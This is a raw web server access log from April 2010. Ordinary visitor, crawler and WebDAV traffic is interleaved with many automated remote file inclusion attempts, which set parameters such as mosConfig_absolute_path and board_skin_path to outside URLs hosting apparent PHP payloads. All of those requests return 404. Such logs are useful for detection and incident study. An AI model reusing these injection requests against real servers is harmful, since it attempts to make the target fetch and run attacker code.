84.40.30.37 - - [07/Apr/2010:07:41:55 -0400] "GET /logs/access_log.Q109070300/tmodules/vwar/admin/admin.php?vwar_root=http://www.mdsl.co.kr/id/1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
84.40.30.37 - - [07/Apr/2010:07:41:57 -0400] "GET /logs/access_log.Q109070300/tmodules/vwar/admin/admin.php?vwar_root=http://www.mdsl.co.kr/id/1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
64.221.88.162 - - [07/Apr/2010:07:42:28 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6.4)"
64.221.88.162 - - [07/Apr/2010:07:42:28 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6.4)"
64.221.88.162 - - [07/Apr/2010:07:42:29 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6.4)"
64.221.88.162 - - [07/Apr/2010:07:42:29 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6.4)"
203.19.4.18 - - [07/Apr/2010:07:42:54 -0400] "GET /logs/error_log.Q109070600//admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
89.149.241.209 - - [07/Apr/2010:07:43:20 -0400] "GET /logs//directory/target/link_main.php?php_rooth_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:43:20 -0400] "GET /logs/error_log.Q110031300%20%20//directory/target/link_main.php?php_rooth_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:43:20 -0400] "GET //directory/target/link_main.php?php_rooth_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:43:33 -0400] "GET /logs/access_log.Q110010700%20%20//directory/target/link_main.php?php_rooth_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
128.210.4.82 - - [07/Apr/2010:07:43:53 -0400] "GET //download.php?board_skin_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
128.210.4.82 - - [07/Apr/2010:07:43:53 -0400] "GET /logs//download.php?board_skin_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
128.210.4.82 - - [07/Apr/2010:07:43:53 -0400] "GET /logs/access_log.Q109082300%20%20//download.php?board_skin_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:44:07 -0400] "GET /logs/error_log.Q110031300//directory/target/link_main.php?php_rooth_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:44:07 -0400] "GET //directory/target/link_main.php?php_rooth_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:44:07 -0400] "GET /logs//directory/target/link_main.php?php_rooth_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
95.108.128.242 - - [07/Apr/2010:07:44:23 -0400] "GET /images/_notes/nav_store_cart_off_r1_c4.jpg.mno HTTP/1.1" 200 210 "-" "Yandex/1.01.001 (compatible; Win16; I)"
128.210.4.82 - - [07/Apr/2010:07:44:24 -0400] "GET //download.php?board_skin_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
128.210.4.82 - - [07/Apr/2010:07:44:24 -0400] "GET /logs/access_log.Q109082300//download.php?board_skin_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
128.210.4.82 - - [07/Apr/2010:07:44:24 -0400] "GET /logs//download.php?board_skin_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:44:27 -0400] "GET /logs/error_log.Q110010700//directory/target/link_main.php?php_rooth_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
87.103.39.147 - - [07/Apr/2010:07:44:33 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/tutorials.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; pt-pt) AppleWebKit/531.21.11 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
87.103.39.147 - - [07/Apr/2010:07:44:33 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/tutorials.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; pt-pt) AppleWebKit/531.21.11 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
172.16.1.180 - - [07/Apr/2010:07:45:42 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [07/Apr/2010:07:45:42 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [07/Apr/2010:07:45:42 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
121.254.172.27 - - [07/Apr/2010:07:46:27 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
121.254.172.27 - - [07/Apr/2010:07:46:27 -0400] "GET /logs/error_log.Q110011000%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
121.254.172.27 - - [07/Apr/2010:07:46:27 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:46:29 -0400] "GET //directory/target/link_main.php?php_rooth_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:46:29 -0400] "GET /logs//directory/target/link_main.php?php_rooth_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:46:34 -0400] "GET /logs/access_log.Q110010700//directory/target/link_main.php?php_rooth_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
87.103.39.147 - - [07/Apr/2010:07:46:51 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/tutorials.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; pt-pt) AppleWebKit/531.21.11 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
209.59.12.99 - - [07/Apr/2010:07:47:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.195.114.252 - - [07/Apr/2010:07:46:55 -0400] "GET /logs/error_log.Q109110200 HTTP/1.0" 200 3843389 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.254.172.27 - - [07/Apr/2010:07:47:12 -0400] "GET /logs/error_log.Q109091600%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
64.221.88.162 - - [07/Apr/2010:07:47:25 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6.4)"
64.221.88.162 - - [07/Apr/2010:07:47:25 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6.4)"
64.221.88.162 - - [07/Apr/2010:07:47:26 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6.4)"
64.221.88.162 - - [07/Apr/2010:07:47:26 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6.4)"
188.165.195.229 - - [07/Apr/2010:07:47:32 -0400] "GET /logs///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:07:47:32 -0400] "GET ///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
66.249.65.182 - - [07/Apr/2010:07:47:35 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01521D5E32A278000A3D047+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.195.114.252 - - [07/Apr/2010:07:47:10 -0400] "GET /logs/error_log.Q109110200 HTTP/1.0" 200 3843389 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.108.128.242 - - [07/Apr/2010:07:48:24 -0400] "GET /2008.itcweb.co.uk/internet-hosting/servers/ HTTP/1.1" 404 241 "-" "Yandex/1.01.001 (compatible; Win16; I)"
188.165.195.229 - - [07/Apr/2010:07:48:42 -0400] "GET /logs/access_log.Q109052900%20%20///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
67.195.114.252 - - [07/Apr/2010:07:48:15 -0400] "GET /logs/access_log.Q109112100 HTTP/1.0" 200 1979338 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.133.122.210 - - [07/Apr/2010:07:49:00 -0400] "GET //errors.php?error=http://smash1.fileave.com/zfxid1.txt%20? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
174.133.122.210 - - [07/Apr/2010:07:49:00 -0400] "GET /logs/access_log.Q109071600%20%20//errors.php?error=http://smash1.fileave.com/zfxid1.txt%20? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
174.133.122.210 - - [07/Apr/2010:07:49:00 -0400] "GET /logs//errors.php?error=http://smash1.fileave.com/zfxid1.txt%20? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
84.40.30.37 - - [07/Apr/2010:07:49:15 -0400] "GET /logs/access_log.Q109110100//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.mdsl.co.kr/id/1.txt? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:07:50:07 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:07:50:07 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:07:50:07 -0400] "GET /logs/access_log.Q109092200//skins/advanced/advanced1.php?pluginpath[0]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
115.89.243.90 - - [07/Apr/2010:07:50:07 -0400] "GET //download.php?board_skin_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
115.89.243.90 - - [07/Apr/2010:07:50:08 -0400] "GET /logs//download.php?board_skin_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:07:50:08 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:07:50:08 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:07:50:08 -0400] "GET /logs/access_log.Q109092200//skins/advanced/advanced1.php?pluginpath[0]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
115.89.243.90 - - [07/Apr/2010:07:50:11 -0400] "GET /logs/access_log.Q109102300%20%20//download.php?board_skin_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
172.16.1.180 - - [07/Apr/2010:07:50:34 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [07/Apr/2010:07:50:34 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [07/Apr/2010:07:50:34 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
211.239.124.204 - - [07/Apr/2010:07:50:48 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:07:50:48 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:07:50:48 -0400] "GET /logs/access_log.Q109092200%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:07:50:49 -0400] "GET //linkadmin.php?page=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:07:50:49 -0400] "GET /logs/access_log.Q110032200%20%20//linkadmin.php?page=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:07:50:49 -0400] "GET /logs//linkadmin.php?page=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:07:50:50 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:07:50:50 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:07:50:50 -0400] "GET /logs/access_log.Q109092200%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:07:50:52 -0400] "GET /logs//linkadmin.php?page=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:07:50:52 -0400] "GET //linkadmin.php?page=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:07:50:52 -0400] "GET /logs/access_log.Q110032200//linkadmin.php?page=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
95.108.128.242 - - [07/Apr/2010:07:52:26 -0400] "GET /images/_notes/nav_store_expr_blue.jpg.mno HTTP/1.1" 200 246 "-" "Yandex/1.01.001 (compatible; Win16; I)"
188.165.195.229 - - [07/Apr/2010:07:52:40 -0400] "GET /logs/access_log.Q109052900///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
119.63.198.97 - - [07/Apr/2010:07:52:49 -0400] "GET /logs/access_log.Q109090900 HTTP/1.1" 304 - "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
84.40.30.37 - - [07/Apr/2010:07:52:57 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.mdsl.co.kr/id/1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
84.40.30.37 - - [07/Apr/2010:07:52:57 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.mdsl.co.kr/id/1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
84.40.30.37 - - [07/Apr/2010:07:52:57 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.mdsl.co.kr/id/1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
84.40.30.37 - - [07/Apr/2010:07:52:59 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.mdsl.co.kr/id/1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
84.40.30.37 - - [07/Apr/2010:07:52:59 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.mdsl.co.kr/id/1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
84.40.30.37 - - [07/Apr/2010:07:52:59 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.mdsl.co.kr/id/1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:07:53:18 -0400] "GET /logs/access_log.Q110020500///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.225.106.11 - - [07/Apr/2010:07:53:19 -0400] "GET ///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
195.225.106.11 - - [07/Apr/2010:07:53:19 -0400] "GET /logs///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
172.16.1.168 - - [07/Apr/2010:07:53:24 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [07/Apr/2010:07:53:24 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [07/Apr/2010:07:53:24 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [07/Apr/2010:07:53:56 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [07/Apr/2010:07:53:56 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [07/Apr/2010:07:53:56 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
195.225.106.11 - - [07/Apr/2010:07:54:15 -0400] "GET /logs/access_log.Q109052900%20%20///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
172.16.1.168 - - [07/Apr/2010:07:54:34 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [07/Apr/2010:07:54:34 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [07/Apr/2010:07:54:34 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
64.221.88.162 - - [07/Apr/2010:07:54:37 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDS; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)"
64.221.88.162 - - [07/Apr/2010:07:54:37 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDS; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)"
64.221.88.162 - - [07/Apr/2010:07:54:37 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDS; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)"
64.221.88.162 - - [07/Apr/2010:07:54:37 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDS; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)"
209.59.12.99 - - [07/Apr/2010:07:55:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.206.36.25 - - [07/Apr/2010:07:55:26 -0400] "GET /logs/error_log.Q109090400//include/admin.lib.inc.php?site_path=http://www.biasy.net/pmnl/view.jpg/1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
195.206.36.25 - - [07/Apr/2010:07:55:26 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.biasy.net/pmnl/view.jpg/1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
195.206.36.25 - - [07/Apr/2010:07:55:28 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.biasy.net/pmnl/view.jpg/1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
172.16.1.168 - - [07/Apr/2010:07:56:11 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [07/Apr/2010:07:56:11 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [07/Apr/2010:07:56:11 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
84.40.30.37 - - [07/Apr/2010:07:56:22 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.mdsl.co.kr/id/1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
84.40.30.37 - - [07/Apr/2010:07:56:23 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.mdsl.co.kr/id/1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
84.40.30.37 - - [07/Apr/2010:07:56:23 -0400] "GET /logs/access_log.Q109090400/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.mdsl.co.kr/id/1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
84.40.30.37 - - [07/Apr/2010:07:56:23 -0400] "GET /logs/access_log.Q109060500/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.mdsl.co.kr/id/1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
217.16.2.167 - - [07/Apr/2010:07:56:25 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://hms.co.il/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
217.16.2.167 - - [07/Apr/2010:07:56:25 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://hms.co.il/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
95.108.128.242 - - [07/Apr/2010:07:56:27 -0400] "GET /images/_notes/ace_logo_top.jpg.mno HTTP/1.1" 200 250 "-" "Yandex/1.01.001 (compatible; Win16; I)"
189.78.125.169 - - [07/Apr/2010:07:56:27 -0400] "GET /logs/access_log.Q110020700//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
84.40.30.37 - - [07/Apr/2010:07:56:28 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.mdsl.co.kr/id/1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
84.40.30.37 - - [07/Apr/2010:07:56:28 -0400] "GET /logs/access_log.Q109060500/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.mdsl.co.kr/id/1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
84.40.30.37 - - [07/Apr/2010:07:56:28 -0400] "GET /logs/access_log.Q109090400/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.mdsl.co.kr/id/1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
84.40.30.37 - - [07/Apr/2010:07:56:28 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.mdsl.co.kr/id/1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
189.78.125.169 - - [07/Apr/2010:07:56:29 -0400] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
217.16.2.167 - - [07/Apr/2010:07:56:37 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://hms.co.il/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
217.16.2.167 - - [07/Apr/2010:07:56:37 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://hms.co.il/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
189.78.125.169 - - [07/Apr/2010:07:56:39 -0400] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
84.40.30.37 - - [07/Apr/2010:07:56:43 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.mdsl.co.kr/id/1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
84.40.30.37 - - [07/Apr/2010:07:56:43 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.mdsl.co.kr/id/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
84.40.30.37 - - [07/Apr/2010:07:56:43 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.mdsl.co.kr/id/1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
84.40.30.37 - - [07/Apr/2010:07:56:43 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.mdsl.co.kr/id/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
84.40.30.37 - - [07/Apr/2010:07:57:13 -0400] "GET /logs/access_log.Q109052800%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.mdsl.co.kr/id/1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
